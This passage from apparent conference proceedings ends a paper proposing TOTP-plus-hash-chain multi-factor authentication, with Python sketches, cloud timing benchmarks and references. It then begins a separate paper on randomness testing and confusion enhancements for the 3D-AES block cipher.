The research papers mentioned above propose techniques that require additional hardware components (such as smart cards or mobile phones) or add a biometric element. These frameworks can be used in environments where the authenticating parties are human. They are not usable (or at least not directly) if the environment consists of hosts that have to communicate with each other (peer-to-peer) without user interaction. Another concern is the implementation of the supporting infrastructure: smart cards will most probably require a PKI infrastructure, and biometrics will require additional specific devices such as mobile phones. Last but not least, the administration and maintenance of such environments add to the overall cost.
We could instead think of a multi-factor authentication between hosts in P2P communication that utilizes the security advantage of one-time passwords together with another technique such as a classical password. No additional infrastructure or cost is needed. The generation of classical passwords is dynamic and brings additional CPU overhead, but, given the measured password generation times in Sect. 6, this concern can be neglected.
4 Proposed Authentication Idea
The framework for multi-factor authentication with dynamically generated passwords presented in this paper is based on the use of TOTP passcodes and classical passwords. Four assumptions must be made at the beginning:
Assumption 1: The client and the server are configured to use the same central time synchronization (either the Network Time Protocol (NTP) or any other method), and the synchronization is working. The generated one-time password is a function of the current time and the shared secret.
Assumption 2: The TOTP shared secret is transferred securely between the client and the server.
Assumption 3: The initial secret value for the first hash chain is generated, transferred securely between the client and the server, and stored at a separate location (not in the same place as the shared secret).
Assumption 4: The initial secret value for the second hash chain is generated, transferred securely between the client and the server, and stored at a separate location (not in the same place as the shared secret and not at the same disk location as the initial secret for the first hash chain).
Before proceeding with the further steps, the following questions must be answered:
Question 1) What type of authentication will be used?
a) Two-Factor Authentication (2FA)
b) Multi-Factor Authentication (MFA), in which another device must be used to complete the authentication.
Question 2) Will two-step or three-step verification be used?
Question 3) Who initiates the authentication process?
a) A user (user-to-host authentication)
b) A host (host-to-host authentication)
Question 4) What is the length of the password?
The difference between user-to-host and host-to-host authentication is that the passwords generated for users should not be very long, whereas this limitation does not apply to the second scenario. The possible options for authentication are 2FA with two-step or three-step verification and MFA with three-step verification:
2FA with two-step verification (suitable for user authentication):
(something that I have) OTP passcode
(something that I know) Password
2FA with three-step verification (suitable for host-to-host authentication):
(something that I have) OTP passcode
(something that I know) Password 1
(something that I know) Password 2
MFA with three-step verification (suitable for user-initiated authentication, because another device must be involved to complete the process):
(something that I have) OTP
(something that I know) Password 1
(something that I am; my identity is guaranteed through my mobile device) Another device (for example, a mobile device) sends Password 2 to the server
How does the validation process with TOTP work? When the client initiates authentication, the OTP passcode is generated and sent to the server. The server compares the OTP passcode received from the client with the one it generates locally. If they match, the authentication is successful. With the proposed framework, the authentication does not stop after validating the OTP passcodes. It goes further: two classical passwords are generated (using the OTP passcode as a basis) and used in the validation process. The passwords are generated with the help of hash chains. Figure 1 shows the whole flow of generating two classical passwords from one OTP passcode.
The first hash chain (HC1) uses the concatenation of the OTP passcode, the digits at its positions 3 and 6, and the so-called “Init Secret HC1” (initial secret for hash chain 1) as the input for the 0th element. Every subsequent element of the hash chain is the hash of the previous element, up to the last element. The index of the last element is the two-digit number formed by the OTP digits at positions 1 and 4, so the length of HC1 is that number plus one (for the 0th element). The first classical password is generated as follows, where HV stands for Hash Value and SHA1 denotes the hash function selected for the first chain:
Password_1 -> Function(OTP, position 3, position 6, Init Secret HC1):
HC1_HV0 = SHA1(OTP, position 3, position 6, Init Secret HC1)
HC1_HV1 = SHA1(HC1_HV0)
HC1_HV2 = SHA1(HC1_HV1)
…
HC1_HVm = SHA1(HC1_HVm-1)
The second hash chain (HC2) uses the concatenation of the OTP passcode, the digits at its positions 1 and 4, and the so-called “Init Secret HC2” (initial secret for hash chain 2) as the input for the 0th element. Every subsequent element is again the hash of the previous element, up to the last element. The index of the last element is the two-digit number formed by the OTP digits at positions 3 and 6, so the length of HC2 is that number plus one (for the 0th element). The second classical password is generated as follows, where SHA2 denotes the hash function selected for the second chain:
Password_2 -> Function(OTP, position 1, position 4, Init Secret HC2):
HC2_HV0 = SHA2(OTP, position 1, position 4, Init Secret HC2)
HC2_HV1 = SHA2(HC2_HV0)
HC2_HV2 = SHA2(HC2_HV1)
…
HC2_HVm = SHA2(HC2_HVm-1)
At this point, the two passwords are generated.
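The two hash chains can be sketched in Python as follows. Several details are assumptions made only for illustration and are not fixed by the text: OTP positions are taken as 1-based, the inputs are concatenated as UTF-8 text in the order listed, each element hashes the raw digest of the previous one, and SHA-256 and SHA3-256 stand in for the two selectable hash functions. All function names are hypothetical.

```python
import hashlib


def _digit(otp: str, position: int) -> str:
    """Return the OTP digit at a 1-based position (assumed indexing)."""
    return otp[position - 1]


def hash_chain_password(otp: str, seed_positions: tuple, index_positions: tuple,
                        init_secret: str, hash_name: str = "sha256") -> bytes:
    """Walk one hash chain and return its last element as raw bytes."""
    if len(otp) != 6 or not otp.isdigit():
        raise ValueError("this sketch assumes a six-digit OTP passcode")
    # 0th element input: OTP + two of its digits + the initial secret.
    seed = otp + "".join(_digit(otp, p) for p in seed_positions) + init_secret
    # Index m of the last element: two-digit number from the other two digits.
    last_index = int("".join(_digit(otp, p) for p in index_positions))
    value = hashlib.new(hash_name, seed.encode("utf-8")).digest()  # HV0
    for _ in range(last_index):  # HV1 .. HVm
        value = hashlib.new(hash_name, value).digest()
    return value


def generate_passwords(otp: str, init_secret_hc1: str, init_secret_hc2: str) -> tuple:
    """Derive Password_1 (HC1) and Password_2 (HC2) from one OTP passcode."""
    password_1 = hash_chain_password(otp, (3, 6), (1, 4), init_secret_hc1, "sha256")
    password_2 = hash_chain_password(otp, (1, 4), (3, 6), init_secret_hc2, "sha3_256")
    return password_1, password_2


p1, p2 = generate_passwords("123456", "init-secret-hc1", "init-secret-hc2")
print(p1.hex(), p2.hex())
```

Since the chain index is a two-digit number, each chain has between 1 and 100 elements, so the work per authentication attempt stays bounded.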
Fig. 1. Generation of two passwords from one OTP with the help of two hash-chains with maximum of 100 elements each

The next step is to squeeze the passwords if needed.

If a human initiates the authentication:
Execute function SQUEEZE (Password_1, 16)
Execute function SQUEEZE (Password_2, 16)
where the function SQUEEZE() extracts 16 bytes from the generated password. This could be any function that returns part of a string. One possible example is to return the first 16 bytes. Another is to return the first eight bytes, then skip eight and return the next eight bytes, or to return every even-positioned byte, or every odd-positioned byte, etc. There are no specific requirements for that function because the two generated passwords are thought to be “randomly” generated.

If the authentication is initiated by a host (or by an application):
No change in the two generated passwords is needed. The password lengths depend on the hash functions used as SHA1 and SHA2: if SHA-256 or SHA3-256 is used, the length is 32 bytes; if SHA-512 or SHA3-512 is used, the length is 64 bytes. In both cases, the passwords are transferred to the server automatically.

The server goes through the same process for generating the two passwords. The final step of the authentication process is the validation of the two generated passwords (just Password_1 or both) by the server. If they are confirmed, the authentication process is successful. The most secure of the three proposed options, MFA with three steps, requires the usage of another device and possibly another communication channel to transfer Password_2 to the server.
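The SQUEEZE variants mentioned above can be illustrated with three small Python functions. The function names and the default of 16 bytes are hypothetical, and "every even-positioned byte" is read here as the bytes at indices 0, 2, 4, and so on; the text leaves the exact selection rule open.

```python
def squeeze_first(password: bytes, n: int = 16) -> bytes:
    """Return the first n bytes."""
    return password[:n]


def squeeze_alternating(password: bytes, n: int = 16, run: int = 8) -> bytes:
    """Take `run` bytes, skip `run` bytes, and repeat until n bytes are kept."""
    kept = bytearray()
    for start in range(0, len(password), 2 * run):
        kept += password[start:start + run]
    return bytes(kept[:n])


def squeeze_even(password: bytes, n: int = 16) -> bytes:
    """Return up to n bytes taken from even indices (0, 2, 4, ...)."""
    return password[0::2][:n]
```

Whichever variant is chosen, the client and the server have to apply the same one, since the server repeats the whole generation process before comparing.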
5 Experimental Environment
Seventeen different but standard virtual machine types running Debian 11 were used (as defined by the vendors: some were general-purpose and some were compute-oriented) in three of the world's biggest providers of cloud infrastructure (Amazon, Microsoft, and Google). On every virtual machine, fifty different tests were executed with 10, 100, 1K, 10K, and 100K sequential computations of four hash functions (SHA-256, SHA-512, SHA3-256 and SHA3-512). As written in [37], TOTP implementations may use the HMAC-SHA-256 and HMAC-SHA-512 functions, which are based on the SHA-256 and SHA-512 hash functions. These functions were selected for that reason, and because they generate output strings with the same lengths as the two SHA3 functions that were used together with them. The virtual machines were equipped with Python v.3.9.2, the hashlib library, the pyotp library, and OpenSSL 1.1.1n (15 Mar 2022). The tests were automated with Python. The goal of this environment was to generate average values for single hash function computations on the standard virtual machine types in the three infrastructures, so that they could be compared. The second environment was a classical client-server architecture, in which the authentication process was tested. To make it closer to a real environment, the client and the host virtual machines (VMs) were created in different data centers.
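A measurement of this kind could be sketched with the standard library alone. The timing method (`time.perf_counter_ns`), the seed value, and the function name `avg_hash_time_ns` are assumptions made for illustration; the text does not describe how the original test scripts measured time.

```python
import hashlib
import time

HASH_NAMES = ("sha256", "sha512", "sha3_256", "sha3_512")
CHAIN_LENGTHS = (10, 100, 1_000, 10_000, 100_000)


def avg_hash_time_ns(hash_name: str, count: int, seed: bytes = b"seed") -> float:
    """Run `count` sequential hash computations and return the mean time in ns."""
    value = seed
    start = time.perf_counter_ns()
    for _ in range(count):
        # Each computation hashes the previous digest, as in a hash-chain.
        value = hashlib.new(hash_name, value).digest()
    elapsed = time.perf_counter_ns() - start
    return elapsed / count


def run_all() -> dict:
    """Collect the average per-hash time for every function and chain length."""
    return {
        (name, count): avg_hash_time_ns(name, count)
        for name in HASH_NAMES
        for count in CHAIN_LENGTHS
    }
```

Calling `run_all()` on one machine gives one sample per combination; repeating it and averaging would be needed to approach the fifty-test setup described above.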
6 Results
Table 1 shows the average values generated from the executed tests for single hash function computations. The table also shows the maximum time needed to compute a hash-chain with a maximum of 100 elements. One hundred and one is the maximum length of the hash-chain, because two digits are taken from the OTP passcode. The average time is given in nanoseconds, while the maximum time needed for a whole hash-chain computation is in microseconds. The column “AVG time for hash computation (HC-HV0)” contains the average measured time in nanoseconds for a single hash function computation.

Table 1. Min. and max. needed times for the hash-chains computation

#    Cloud provider   Hash function   AVG time for hash computation (HC-HV0), [ns]   HC-HV100, [microsec]
1    AWS              SHA3-512        1507.93                                        151
2    AWS              SHA3-256        1106.86                                        111
3    AWS              SHA-512         1227.39                                        123
4    AWS              SHA-256         949.53                                         95
5    Azure            SHA3-512        1477.11                                        148
6    Azure            SHA3-256        999.28                                         100
7    Azure            SHA-512         1179.28                                        118
8    Azure            SHA-256         860.58                                         87
9    GCP              SHA3-512        1657.39                                        166
10   GCP              SHA3-256        1137.31                                        114
11   GCP              SHA-512         1311.60                                        132
12   GCP              SHA-256         985.48                                         99

All the authentication tests were done with the TOTP validity of a generated passcode configured to one second. The value of this parameter was tested carefully for the environments used. It depends on the network latency between the client and the host. It also depends on the performance of both hosts participating in the authentication process. So, in a real production environment, its setting must follow the usability of the whole system: neither too short nor too long.
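The HC-HV100 column appears consistent with multiplying the average single-hash time by 100 and rounding up to the next whole microsecond. The sketch below reproduces the column under that assumption; the rounding rule is inferred from the table values and is not stated in the text, and the function name is hypothetical.

```python
import math

# Average single-hash times in nanoseconds, copied from Table 1.
AVG_NS = {
    ("aws", "SHA3-512"): 1507.93, ("aws", "SHA3-256"): 1106.86,
    ("aws", "SHA-512"): 1227.39, ("aws", "SHA-256"): 949.53,
    ("azure", "SHA3-512"): 1477.11, ("azure", "SHA3-256"): 999.28,
    ("azure", "SHA-512"): 1179.28, ("azure", "SHA-256"): 860.58,
    ("gcp", "SHA3-512"): 1657.39, ("gcp", "SHA3-256"): 1137.31,
    ("gcp", "SHA-512"): 1311.60, ("gcp", "SHA-256"): 985.48,
}


def chain_time_us(avg_ns: float, elements: int = 100) -> int:
    """Estimate the time for `elements` sequential hashes, rounded up to whole microseconds."""
    return math.ceil(avg_ns * elements / 1000)


HC_HV100_US = {key: chain_time_us(avg) for key, avg in AVG_NS.items()}
```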
7 Analysis of the Experimental Results
The column “HC-HV100” (Hash-Chain Hash Value 100) in Table 1 shows the maximum time needed to calculate one hundred elements of a hash-chain in each of the three providers with the selected hash function. The tested hash functions are SHA-256, SHA3-256, SHA-512, and SHA3-512. So, the column HC-HV100 contains the maximum time needed for the calculation with each of these hash functions in Amazon’s AWS (aws), Microsoft’s Azure (azure), and Google’s GCP (gcp) environments. Although the purpose of this research is not to compare the infrastructure environments, the following conclusions can be made in this regard:

For the SHA-256 hash function, the fastest computation of 100 hash values is in the Azure environment and is 12.12% faster than the slowest, in GCP.
For the SHA3-256 hash function, the result is similar: the fastest computation is in the Azure infrastructure and is 12.28% faster than the slowest, in GCP.
For the SHA-512 hash function, the shortest time to compute 100 sequential hashes is again in the Azure environment and is 10.6% faster than the slowest (measured in GCP).
For SHA3-512, computation in Azure gives the quickest time, which is 10.85% faster than the slowest (in GCP).

The results presented in Table 1 show the maximum time needed for 100 sequential hash calculations. Generally, the index of the last element of both hash-chains will be in the interval [0;99]. This means that the actual time for generating a single password will be less than the values in the HC-HV100 column. Another aspect of the overall performance is that two hash-chains must be calculated. They can be calculated in parallel, so the total time for generating both classical passwords is the time needed to calculate the longer hash-chain (this depends on the OTP passcode positions 1, 4 and 3, 6). Only four hash functions were selected for the tests. They have different constructions and generate different digest sizes. Undoubtedly, the two hash-chains could be used with other hash functions.
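The relative differences quoted above can be recomputed from the HC-HV100 column of Table 1 as (slowest − fastest) / slowest. The sketch below does this for each hash function; the helper name is hypothetical, and because the inputs are the rounded microsecond values, the last digit may differ slightly from the figures in the text.

```python
# HC-HV100 values in microseconds, copied from Table 1.
HC_HV100_US = {
    "SHA-256": {"aws": 95, "azure": 87, "gcp": 99},
    "SHA3-256": {"aws": 111, "azure": 100, "gcp": 114},
    "SHA-512": {"aws": 123, "azure": 118, "gcp": 132},
    "SHA3-512": {"aws": 151, "azure": 148, "gcp": 166},
}


def fastest_vs_slowest(times: dict) -> tuple:
    """Return (fastest provider, slowest provider, percent difference relative to slowest)."""
    fastest = min(times, key=times.get)
    slowest = max(times, key=times.get)
    percent = (times[slowest] - times[fastest]) / times[slowest] * 100
    return fastest, slowest, percent


for hash_name, times in HC_HV100_US.items():
    fastest, slowest, percent = fastest_vs_slowest(times)
    print(f"{hash_name}: {fastest} is {percent:.2f}% faster than {slowest}")
```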
8 Conclusion
The proposed framework for multi-factor authentication can be widely used. From a security point of view, it relies on the shared secret being securely synchronized between the client and the server. It involves a few steps of authentication with the generation and usage of two classical passwords (and, of course, just one of them can be used for the authentication). Both classical passwords are generated through the computation of two hash-chains. The 0th element of each hash-chain uses three components as its initial value: the generated OTP passcode, the values from two of the positions of the OTP passcode, and an Init Secret. Two different Init Secrets are used, one for each hash-chain. Those two values must be kept separately so that access to them is secured. The whole authentication framework relies solely on three secret values: the Shared Secret (used by the TOTP algorithm), the Init Secret HC1 (part of the initial value for computing the 0th element of the first hash-chain), and the Init Secret HC2 (part of the initial value for computing the 0th element of the second hash-chain).

With the selected four hash functions, the minimum time for the computation of one hundred sequential hash values is 87 microseconds (using SHA-256). The maximum measured time for the computation of one hundred sequential hash values is 166 microseconds (using SHA3-512). The maximum time for the generation of the two passwords is in the interval [87;166] microseconds. So, there is a lot of remaining time, up to one second, to complete the authentication. After the generation and verification of the OTP passcode, the authentication process does not depend on time. The validation of both classical passwords can take place over a longer period. The total time for classical password validation can be restricted depending on the requirements and the physical implementation.

This framework uses an authentication method that does not need to store the OTP passcodes or the two classical passwords. All are generated dynamically. But the secret values must be saved locally (at the client and the server) as securely as possible. The whole authentication relies on those secret values. In an actual implementation, the secret values could be changed often. The proposed framework utilizes the standardized TOTP algorithm and extends the authentication process, offering multi-factor authentication and a validation process with a few steps.
9 Further Research
The study could be extended in a few directions. First, more hash functions can be included to give better visibility of the maximum time needed for hash-chain computation. Another approach could be to consider using three, maybe four, or even more positions from the OTP passcode to build the hash-chains. It is worth checking out options for frequent changes of the initial secrets of the hash-chains. Multi-step MFA authentication options across multiple devices could also be explored.

Acknowledgment. The research reported here was funded by the project No.29/03.06.2022 (“Research Laboratory Establishment for Artificial Intelligence and Cloud Technologies”), by the University of Telecommunications and Post, Sofia, Bulgaria.
References
1. Clarke, N.L., Furnell, S.M.: Authentication of users on mobile telephones – a survey of attitudes and practices. Comput. Secur. 24, 519–527 (2005). https://doi.org/10.1016/j.cose.2005.08.003
2. Gold, S.: Password alternatives. Network Security September 2010. Elsevier (2010)
3. Sokolov, S.A., Iliev, T.B., Stoyanov, I.S.: Analysis of cybersecurity threats in cloud applications using deep learning techniques. In: 2019 42nd International Convention on Information and Communication Technology, Electronics and Microelectronics (MIPRO), pp. 441–446 (2019). https://doi.org/10.23919/MIPRO.2019.8756755
4. Hayashi, E., Christin, N.: Use your illusion: secure authentication usable anywhere. In: Symposium on Usable Privacy and Security (SOUPS) 2008, July 23–25, 2008, Pittsburgh, PA, USA. ACM (2008)
5. Hadjidemetriou, G., et al.: Picture passwords in mixed reality: implementation and evaluation. In: Extended Abstracts, CHI 2019, 4–9 May, Glasgow, Scotland, UK. ACM (2019). https://doi.org/10.1145/3290607.3313076
6. Rui, Z., Yan, Z.: A survey on biometric authentication: toward secure and privacy-preserving identification. IEEE Access (2018). https://doi.org/10.1109/ACCESS.2018.2889996
7. Alaca, F., van Oorschot, P.C.: Device fingerprinting for augmenting web authentication: classification and analysis of methods. In: ACSAC 2016, 05–09 December 2016, Los Angeles, CA, USA. ACM (2016). https://doi.org/10.1145/2991079.2991091
8. Xu, Y., Li, Z., Yang, J., Zhang, D.: A survey of dictionary learning algorithms for face recognition. IEEE Access (2017). https://doi.org/10.1109/ACCESS.2017.2695239
9. Galbally, J., Marcel, S., Fierrez, J.: Biometric antispoofing methods: a survey in face recognition. IEEE Access, 18 December 2014. https://doi.org/10.1109/ACCESS.2014.2381273
10. Lin, F., et al.: Brain password: a secure and truly cancelable brain biometrics for smart headwear. In: MobiSys 2018, 10–15 June 2018, Munich, Germany. ACM (2018). https://doi.org/10.1145/3210240.3210344
11. Mustafa, T., et al.: Unsure how to authenticate on your VR Headset? Come on, use your head! In: Authentication, Software, Vulnerabilities, Security Analytics, IQSPA 2018, Tempe, AZ, USA. ACM, 21 March 2018. https://doi.org/10.1145/3180445.3180450
12. Nguyen, M., Tran, H., Le, H., Yan, W.Q.: A tile based color picture with hidden QR code for augmented reality and beyond. In: VRST 2017, Gothenburg, Sweden. ACM, 8–10 November 2017. https://doi.org/10.1145/3139131.3139164
13. Stebila, D., Udupi, P., Chang, S.: Multi-factor password-authenticated key exchange. In: Proceedings of 8th Australasian Information Security Conference (AISC 2010), Brisbane, Australia, CRPIT Volume 105 – Information Security 2010. ACM (2010)
14. Carter, N.: Graphical passwords for older computer users. In: ACM 2015, Charlotte, NC, USA, UIST 2015 Adjunct, 08–11 November 2015. 978-1-4503-3780-9/15/11. https://doi.org/10.1145/2815585.2815593
15. Ratakonda, D.K.: Children’s authentication: understanding and usage. In: IDC 2019, Boise, ID, USA. ACM, 12–15 June 2019. ISBN 978-1-4503-6690-8/19/06. https://doi.org/10.1145/3311927.3325354
16. Manjula Shenoy, K., Supriya, A.: Authentication using alignment of the graphical password. In: ICAICR-2019, 15–16 June 2019, Shimla, H.P., India. ACM (2019). https://doi.org/10.1145/3339311.3339332
17. Derhab, A., et al.: Two-factor mutual authentication offloading for mobile cloud computing. IEEE Access 8, 28956–28969 (2020)
18. Abuarqoub, A.: A lightweight two-factor authentication scheme for mobile cloud computing. In: ICFNDS 2019, 1–2 July 2019, Paris, France. ACM (2019). https://doi.org/10.1145/3341325.3342020
19. Read, J.C., Cassidy, B.: Designing textual password systems for children. In: IDC 2012, 12–15 June 2012, Bremen, Germany (2012)
20. Siddiqui, Z., Tayan, O., Khan, M.K.: Security analysis of smartphone and cloud computing authentication frameworks and protocols. IEEE Access 6, 2018 (2018)
21. Mohsin, J.K., Liangxin Han, M.: Two factor vs multi-factor, an authentication battle in mobile cloud computing environments. In: ICFNDS 2017, 19–20 July 2017, Cambridge, United Kingdom. ACM (2017). https://doi.org/10.1145/3102304.3102343
22. Abdulrahman, A., et al.: A secure and practical authentication scheme using personal devices. IEEE Access 5, 2017 (2017). https://doi.org/10.1109/ACCESS.2017.2717862
23. Morris, R., Thompson, K.: Password security: a case history. Commun. ACM 22(11), 594–597 (1979)
24. Changhee, L., Heejo, L.: A password stretching method using user specific salts. In: WWW 2007, 8–12 May 2007, Banff, Alberta, Canada. ACM (2007)
25. Furnell, S.: Authenticating ourselves: will we ever escape the password? Network Security 2005(3), 8–13 (2005)
26. Fordyce, T., Green, S., Gros, T.: Investigation of the effect of fear and stress on password choice. In: 7th ACM Workshop on Socio-Technical Aspects in Security and Trust, Orlando, Florida, USA, December 2017 (STAST 2017) (2017)
27. Monrose, F., Reiter, M.K., Wetzel, S.: Password hardening based on keystroke dynamics. In: CCS 1999, 11/99, Singapore. ACM (1999)
28. Chuda, D., Durfina, M.: Multifactor authentication based on keystroke dynamics. In: International Conference on Computer Systems and Technologies – CompSysTech 2009. ACM (2009)
29. Gong, C., Behar, B.: Understanding password security through password cracking. JCSC 33, 5 (2018)
30. Halderman, J.A., Waters, B., Felten, E.W.: A convenient method for securely managing passwords. In: International World Wide Web Conference Committee (IW3C2) 2005, May 10–14, Chiba, Japan. ACM (2005)
31. Garrison, C.P.: Encouraging good passwords. In: InfoSecCD Conference 2006, September 22–23, Kennesaw, GA, USA. ACM (2006)
32. Houshmand, S., Aggarwal, S.: Building better passwords using probabilistic techniques. In: ACSAC’12, December 3–7, 2012, Orlando, Florida, USA. ACM (2012)
33. Richard, S., et al.: Can long passwords be secure and usable? In: CHI 2014, April 26–May 01, 2014, Toronto, ON, Canada. ACM (2014). https://doi.org/10.1145/2556288.2557377
34. Hoffman, L.J.: Computers and privacy: a survey. Comput. Surv. 1(2), 85–103 (1969)
35. Peters, B.: Security considerations in a multi-programmed computer system. In: Proceedings AFIPS 1967 Spring Joint Computer Conference, vol. 30, Thompson Book Co., Washington, D.C., pp. 283–286 (1967)
36. Petersen, H.E., Turn, R.: System implications of information privacy. In: Spring Joint Computer Conference, vol. 30, Thompson Book Co., Washington, D.C., pp. 291–300. Also available as Doc. P-3504, Rand Corp., Santa Monica, California, 17–19 April 1967
37. RFC 6238. https://datatracker.ietf.org/doc/html/rfc6238. Accessed 22 Sep 2022
38. RFC 4226. https://datatracker.ietf.org/doc/html/rfc4226. Accessed 30 Aug 2022
39. Lamport, L.: Password authentication with insecure communication. Commun. ACM 24(11), 770–772 (1981)
40. Woo, T.Y.C., Lam, S.S.: Authentication for distributed systems. University of Texas at Austin, January 1992 (1992)
41. Huang, X., Xiang, Y., Chonka, A., Zhou, J., Deng, R.H.: A generic framework for three-factor authentication: preserving security and privacy in distributed systems. IEEE Trans. Parall. Distrib. Syst. 22(8), 1390–1397 (2011). https://doi.org/10.1109/TPDS.2010.206
42. Amlan, J.C., Pardeep, K., Mangal, S., Hyotaek, L., Hoon, J.-L.: A strong user authentication framework for cloud computing. In: 2011 IEEE Asia-Pacific Services Computing Conference (2011). https://doi.org/10.1109/APSCC.2011.14
43. Rohitash, K.B., Pragya, J., Vijendra, K.J.: Multi-factor authentication framework for cloud computing. In: 2013 Fifth International Conference on Computational Intelligence, Modelling and Simulation, IEEE Computer Society (2013). https://doi.org/10.1109/CIMSim.2013.25
44. Jiangshan, Y., Guilin, W., Yi, M., Wei, G.: An efficient generic framework for three-factor authentication with provably secure instantiation. In: IEEE Transactions on Information Forensics and Security, vol. 9, no. 12, December 2014. https://doi.org/10.1109/TIFS.2014.2362979
45. Bernard, P.: Security considerations in a multi-programmed computer system. In: National Security Agency, Spring Joint Computer Conference, pp. 283–286 (1967)
Randomness Testing on Strict Key Avalanche Data Category on Confusion Properties of 3D-AES Block Cipher Cryptography Algorithm
Nor Azeala Mohd Yusof1 and Suriyani Ariffin2(B)
1 Cyber Security Malaysia, 43300 Seri Kembangan, Selangor, Malaysia
2 Faculty of Computer and Mathematical Sciences, Universiti Teknologi MARA, Selangor, Malaysia
[email protected]
Abstract. In data encryption with block cipher cryptographic algorithms, the security of the algorithm is measured based on Shannon’s confusion and diffusion properties using randomness tests. The 3D-AES block cipher was developed from, and inspired by, selected features of immune systems: antigen-antibody interaction, somatic hypermutation and protein structure. However, it has not yet been proved whether these computation elements from immune systems can be successfully applied to, and satisfy, Shannon’s diffusion property in designing a new block cipher algorithm. Based on the results of the analysis done in previous research, 3D-AES passes the randomness tests in all of the seven data categories except Strict Key Avalanche (SKA), based on a 0.1% significance level and 1,000 generated key streams. Hence, in this research paper, we present and compare the statistical analysis conducted on 3D-AES and its enhanced version, namely the Enhanced 3D-AES block cipher. To ensure adequately high security of systems in the world of information technology, the laboratory experiment results are presented and analyzed. They show that the randomness and non-linearity on SKA of the output of the Enhanced 3D-AES symmetric encryption block cipher are comparable to those of the 3D-AES symmetric encryption block cipher.

Keywords: 3D-AES block cipher · Cryptographic algorithm · Encryption · Confusion · Randomness test
1 Introduction
The 3D-AES is a symmetric encryption block cipher that is developed based on the AES architecture, and it is a key-alternating technique. This AES-like algorithm has satisfied Shannon’s confusion and diffusion properties by applying the randomness and non-linearity of the human immune system. The interaction between the antigen and antibody has been adopted as its design model, where the key acts like the antigen and the plaintext acts like the antibody [1].

© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 577–588, 2023. https://doi.org/10.1007/978-3-031-28073-3_40
Over the past couple of years, some work has been conducted to evaluate the security of the 3D-AES block cipher against various security analysis techniques. These techniques are linear cryptanalysis and differential cryptanalysis [1], the square attack [2], the boomerang attack [2], and most recently the randomness test [3]. The randomness test is one of the measurement techniques that have been considered in the evaluation of the minimum security requirement for a block cipher algorithm [3]. The property of randomness is fundamental and is reflected in the power of an encryption algorithm: selecting a strong encryption key minimizes the probability of an attacker detecting or guessing these numbers [4]. A non-random block cipher seems to be vulnerable to any type of attack [5].

Based on the findings of the recent research done by [3], the major failure of the randomness analysis on 3D-AES is in the Strict Key Avalanche (SKA) data category. This major failure allows a cryptanalyst to use such information to conduct a known-plaintext attack to find the key. Under the assumptions of this attack, the cryptanalyst may know a few plaintext-ciphertext pairs of blocks. The attack aims to derive the key, after which the cryptanalyst would be able to decrypt an entire intercepted ciphertext. A known-plaintext attack can be much faster than an exhaustive key search.

Confusion is one of the properties of a secure cipher operation. Confusion refers to making the relationship between the ciphertext and the symmetric key as complex and involved as possible, which can be implemented through substitutions and permutations [6], and it needs to be fulfilled in a standard and accepted block cipher design. Nowadays, modern encryption mechanisms, particularly private encryption schemes, use confusion, diffusion, and a number of rounds in a combined fashion [7]. The aim of confusion is to make it very hard to find the key even if one has a large number of plaintext-ciphertext pairs produced with the same key. The previous studies done by Hu and Kais [8], Kumar et al. [9], and Maryoosh et al. [10] show that an algorithm which includes a confusion component could enrich the security, sensitivity, and robustness of the model. Hence, to tackle the major randomness issue in the SKA data category, this paper proposes a modified 3D-AES algorithm that is injected with other confusion functions to enhance its security level, especially its sensitivity to changes in the 128-bit key.
2 Review of 3D-AES
3D-AES is a symmetric encryption block cipher that is developed based on the AES architecture, and it is a key-alternating technique. This AES-like algorithm has satisfied Shannon’s confusion and diffusion properties by applying the randomness and non-linearity of the human immune system. The interaction between the antigen and antibody has been adopted as its design model, where the key acts like the antigen and the plaintext acts like the antibody [1].

Ariffin et al. [1] stated that the input and output of the 3D-AES algorithm are composed of a 3D array of bytes in the form of a cubic structure. The cube contains 64 bytes (512 bits), where the length, width, and depth of the cube are each four bytes (4 × 4 × 4). The cube is illustrated in Fig. 1. The key size is 128 bits, in the form of a 2D array, which is similar to the AES key design. The encryption process of the 3D-AES consists of the basic AES components, which are SubBytes, ShiftRows, MixColumn, and addRoundKey. However, new functions have been added to it. Figure 2 shows the components of the 3D-AES algorithm. The new functions are rotationKey, which rotates the key about three different axes (x-axis, y-axis, and z-axis), and 3D-SliceRotate, which contains getSliceCube, getRotateSlice, and SubBytes.

Fig. 1. 3D-AES input and output’s cube with the rotation axes

Fig. 2. Components of 3D-AES block cipher

3D-SliceRotate is a permutation process on the 4 × 4 × 4 state of bytes, including the rotation about the x-axis, y-axis, and z-axis. The set (a000, a001, a002, a003, …, a033) represents the front Slice, the set (a100, a101, a102, a103, …, a133) represents the second Slice, the set (a200, a201, a202, a203, …, a233) represents the third Slice, and the set (a300, a301, a302, a303, …, a333) represents the fourth Slice. Each Slice is rotated in 3D-SliceRotate by one of four angles: the first Slice is not rotated (0°), the second Slice is rotated by 90°, the third Slice by 180°, and the fourth Slice by 270°.
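The per-slice rotation angles described above can be illustrated with a short Python sketch. It models only the rotation of the four 4 × 4 slices by 0°, 90°, 180°, and 270°; the clockwise direction, the nested-list cube layout `cube[x][y][z]`, and the function names are assumptions, and the SubBytes step and the rotations about the other axes are not modelled.

```python
def rotate90(slice4x4):
    """Rotate one square slice by 90 degrees (clockwise is an assumption)."""
    return [list(row) for row in zip(*slice4x4[::-1])]


def slice_rotate(cube):
    """Rotate slice x of the cube by x * 90 degrees (0, 90, 180, 270)."""
    rotated = []
    for index, current in enumerate(cube):
        for _ in range(index):
            current = rotate90(current)
        rotated.append([list(row) for row in current])
    return rotated


# Example state: each byte holds its own position number 16x + 4y + z.
cube = [[[16 * x + 4 * y + z for z in range(4)] for y in range(4)] for x in range(4)]
rotated = slice_rotate(cube)
```

In this example the front slice is unchanged, and the third slice comes out with both its rows and its columns reversed, as expected for a 180° rotation.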
3 Proposed Design of Enhanced 3D-AES Block Cipher
3.1 Confusion-Based Function
Based on the findings of the randomness analysis done by [3], the major failure of the randomness analysis on 3D-AES is in the Strict Key Avalanche (SKA) data category. This major failure allows a cryptanalyst to use such information to conduct a known-plaintext attack to find the key. Under the assumptions of this attack, the cryptanalyst may know a few plaintext-ciphertext pairs of blocks. The attack aims to derive the key, after which the cryptanalyst would be able to decrypt an entire intercepted ciphertext. A known-plaintext attack can be much faster than an exhaustive key search.

Confusion is one of the properties of a secure cipher operation. Confusion refers to making the relationship between the ciphertext and the symmetric key as complex and involved as possible, which can be implemented through substitutions and permutations [6]. Nowadays, modern encryption mechanisms, particularly private encryption schemes, use confusion, diffusion, and a number of rounds in a combined fashion [7].

